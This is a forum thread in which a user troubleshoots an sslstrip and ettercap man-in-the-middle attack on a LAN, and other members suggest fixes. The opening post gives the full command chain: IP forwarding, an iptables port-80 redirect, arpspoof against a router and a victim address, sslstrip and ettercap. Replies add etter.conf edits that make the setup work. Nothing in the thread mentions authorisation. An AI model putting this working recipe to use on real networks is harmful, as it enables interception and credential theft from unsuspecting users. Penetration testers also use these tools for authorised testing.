Ettercap - iptables problem : permission denied

[Carto_]

Hello All,


I'm actually trying to get sslstrip/ettercap working on a Lan.

-1)

Code:

echo 1 > /proc/sys/net/ipv4/ip_forwar

d
(when i type "

Code:

cat /proc/sys/net/ipv4/ip_forward

it's OK, value = 1)

-2)

Code:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

-3)

Code:

arpspoof -i wlan1 -t 192.168.1.1 192.168.1.37

-4)

Code:

sslstrip -a -k -l 10000

-5)

Code:

ettercap -T -q -p -i wlan1

--
I launch the attack. The victim can go on the web, the https is very slow but nothing in sslstrip.log and when i shut down Ettercap i obtain this :

Code:

iptables v1.4.4: can't initialize iptables table `nat': Permission denied (you must be root)
Perhaps iptables or your kernel needs to be upgraded.
iptables v1.4.4: can't initialize iptables table `nat': Permission denied (you must be root)
Perhaps iptables or your kernel needs to be upgraded.
iptables v1.4.4: can't initialize iptables table `nat': Permission denied (you must be root)
Perhaps iptables or your kernel needs to be upgraded.
iptables v1.4.4: can't initialize iptables table `nat': Permission denied (you must be root)

...

I'm actually looking on many sites since something like 2 hours but i don't find any solution ... Someone speak about changing UID and GID to 0 ... I don't think that i will change anything but ...

I someone have an idea, i'll love him for the end of my life (of course i do!)


EDIT: Of course i'm root !

[buffer]

Hi,

As you handle packet forwarding with iptables, have you tried ettercap 'unoffensive' mode ?

Code:

ettercap -T -q -p -u -i wlan1

[Ubuntu4life]

Having the exact same issue...

[Dudeman02379]

The error that you are getting is saying that you are not root. Try throwing a "sudo" in front of your iptables command.

Code:

 sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

Or make sure you are logging in as root.

EDIT: I just tested the Gnome x86 distro running the exact commands that you are using and everything worked fine. No errors and captured traffic.

[r083rt]

have you edit the ettercap config file???

Code:

nano /etc/etter.conf

hold shift + press w then t
enter line 17 and you will see these lines you must change to 0

ec_uid = 65534 # nobody is the default
ec_gid = 65534 # nobody is the default

to this

ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default

hold shift + press w then t
type 1 then
hold shift + press w then t
type 168 and change the following lines

#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

to this

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

press ctrl+x and y to save



r083rt

[Ubuntu4life]

^ Did all of that.
I've been able to run Ettercap in the past.
More people have this problem when I google arround.

[r083rt]

Code:

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

if you are using gnome you might want to use the super user command
ive had this in the passed when cat gives out the output of 1 but is not giving root privileges

[thorin]

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

I'm not sure if this happens on BT but sometimes when you do things like this on Ubuntu if you're sudo creds aren't cached then the command will just hang because you never get prompted by the piped command for your sudo creds.

[Dudeman02379]

Have you tried using eth0 instead of wlan1? Possibly a compatibility problem with your wireless card? Also which version of Backtrack 5 are you using?

[r083rt]

sorry yea thorin I know but just throwing it out there as a workaround itsused in ubuntu when user wants to do it on the fly ive ettercap running in both gnome and kde just trying to give some suggestions to elimiate or narrow down some things it wasnt a permanent fix just trying to find out if its a user problem or something else and fix and find out why the OP is having the problem

just trouble shooting trying differnet things and then find the proper soultion based on the work around

Have you tried using eth0 instead of wlan1? Possibly a compatibility problem with your wireless card? Also which version of Backtrack 5 are you using?

with compatibility problem It should however go into forwarding mode but packets will be returned and not give the root user message but all help and ideas are grateful


thanks

r083rt